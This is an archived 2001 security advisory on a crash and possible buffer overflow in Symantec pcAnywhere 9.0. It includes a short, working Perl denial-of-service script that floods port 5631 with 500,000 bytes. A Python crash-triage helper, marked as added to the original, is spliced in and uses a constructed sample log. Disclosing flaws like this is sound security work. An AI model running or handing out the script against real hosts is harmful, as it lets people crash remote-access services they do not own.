scx-sa-14.txt

2001-02-14T00:00:00
ID PACKETSTORM:24293
Type packetstorm
Reporter Root-dude
Modified 2001-02-14T00:00:00

Description

=============================================================================
Securax-SA-14 Security Advisory  
belgian.networking.security Dutch  
=============================================================================  
Topic: Symantec pcAnywhere 9.0 DoS / Buffer Overflow  
Announced: 2001-02-08  
Affects: Symantec PcAnywhere 9.0 on Microsoft Windows 98 SE  
=============================================================================  
  
  
  
Note: This entire advisory is based on trial-and-error results. We cannot
guarantee that the information below is 100% correct, since we have no
source code to audit. This document is subject to change without prior
notice.
  
If you happen to find more information / problems concerning the problem
below, or further variants, please contact me at the following email,
incubus@securax.net, or you can contact info@securax.org.
  
  
I. Problem Description  
-----------------------  
  
Symantec PcAnywhere is a program that allows others (who are authorised
to have access :)) to use your PC. It's similar to a Windows NT 4.0 terminal
server.
  
PcAnywhere (when it's configured to 'be a host pc') listens on two ports: 5631
(pcanywheredata, according to nmap) and 65301 (pcanywhere). When a user
sends certain data in a particular way, pcAnywhere will crash.
  
When a large amount of data (it varies: sometimes the host goes down with 320k
characters, sometimes you have to send 500k bytes) is sent to a 'waiting' host
on the pcanywheredata port, "AWHOST32.EXE" crashes, shows an error on the
screen, and writes "Unexpected program error" to a logfile (together with EAX,
EBX, ..., so read them; you'll find the yummy 0x61616161).
  
Oh yeah, don't use uppercase characters, as PcAnywhere won't crash on them.  
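An added crash-triage helper, not part of the advisory: it reads a register dump like the one the crash writes to the log and reports which registers hold nothing but the sent fill byte, which is the check the advisory describes (look for 0x61616161 in EAX, EBX, ...). The log layout and values are a constructed sample, since the real AWHOST32.EXE log format is not given here.

```python
import re

# Constructed sample of a crash log entry (assumed layout, not the real
# AWHOST32.EXE format): EAX, EBX and ESI were overwritten by the sent 'a' bytes,
# the other registers still hold ordinary-looking values.
SAMPLE_LOG = """\
2001-02-08 21:14:02 AWHOST32.EXE Unexpected program error
EAX=61616161 EBX=61616161 ECX=0012ff88 EDX=00000000
ESI=61616161 EDI=00401000 EBP=0012ff6c ESP=0012ff20 EIP=bff7b9a6
"""

# Matches "NAME=hhhhhhhh" for the eight general registers plus EIP.
REG_RE = re.compile(r"\b(E[ABCD]X|E[SD]I|E[BS]P|EIP)=([0-9A-Fa-f]{8})\b")


def parse_registers(log_text):
    """Return {register name: int value} for every register in the dump."""
    return {name.upper(): int(val, 16) for name, val in REG_RE.findall(log_text)}


def fill_pattern(fill_byte):
    """32-bit value a register holds when fully overwritten by a run of fill_byte
    (0x61 'a' -> 0x61616161; 0x41 'A' -> 0x41414141)."""
    return int.from_bytes(bytes([fill_byte]) * 4, "little")


def controlled_registers(log_text, fill_byte=0x61):
    """Names of registers whose entire value equals the fill pattern, i.e. that
    were overwritten by the data that was sent rather than by the program."""
    pattern = fill_pattern(fill_byte)
    return sorted(r for r, v in parse_registers(log_text).items() if v == pattern)


def triage(log_text, fill_byte=0x61):
    """Classify the crash for the defender: 'eip-control' if the instruction
    pointer itself carries the fill pattern (a code-execution risk, not just a
    DoS), 'data-control' if only general registers do, 'unknown' otherwise."""
    ctl = controlled_registers(log_text, fill_byte)
    if "EIP" in ctl:
        return "eip-control", ctl
    if ctl:
        return "data-control", ctl
    return "unknown", ctl


if __name__ == "__main__":
    print(triage(SAMPLE_LOG))  # ('data-control', ['EAX', 'EBX', 'ESI'])
```

Run it against a real dump by replacing SAMPLE_LOG with the log text; a result other than 'unknown' means the sent bytes reached CPU registers and the crash deserves memory-safety follow-up, not just a restart.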
  
Why no exploit, just a lame Denial of Service?  
  
1.) because I suck at win32 debugging / overflowing (but I'm reading)
/* so if I can overflow win32 progs, I'll code an exploit */
2.) as the amount of data is variable, it's hard to overflow..
  
The DoS code:  
  
<--bof-->  
  
#!/usr/bin/perl  
  
# Symantec PcAnywhere 9.0 Denial of Service  
# -----------------------------------------  
# by incubus <incubus@securax.net>  
# http://www.hexyn.be  
#  
# http://www.securax.net  
# All my love to Tessa.  
# Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,  
# Zym0tic, segfault, #securax@irc.hexyn.be  
# Thanks to jurgen swennen, for letting me (ab)use his computer.  
#  
# this is intended as proof of concept, do not abuse!  
  
use IO::Socket;  
$host = "$ARGV[0]";  
$port = 5631;  
if ($#ARGV<0) {  
print "use it like: $0 <hostname>\n";  
exit();  
}  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,   
PeerPort=>$port) || die "damn, ";  
print "hello\n";  
$buf = "";  
for($counter = 0; $counter < 500000; $counter++) {  
$buf .= "\x61";  
}  
print $socket "$buf\n";  
close($socket);  
exit();  
  
<--eof-->  
  
  
II. Impact  
----------  
  
If someone exploits this, then Symantec is forced to rename this product to
PcAnyoneAnywhere or something...
  
No, seriously, this could lead to a compromise of a system.  
  
  
III. Possible Workarounds
-------------------------
  
This advisory was also sent to Symantec (info@symantec.com), we'll see what  
they do with it...  
  
IV. Credits
-----------
love to Tessa.  
greetz go out to : f0bic, r00t, Zym0t1c, vorlon, cicer0, tomicron, segfau|t,  
and so many, many others I forgot...  
  
  
=============================================================================  
For more information incubus@securax.org  
Website http://www.securax.org  
Advisories/Text http://www.securax.org/pers  
-----------------------------------------------------------------------------  
  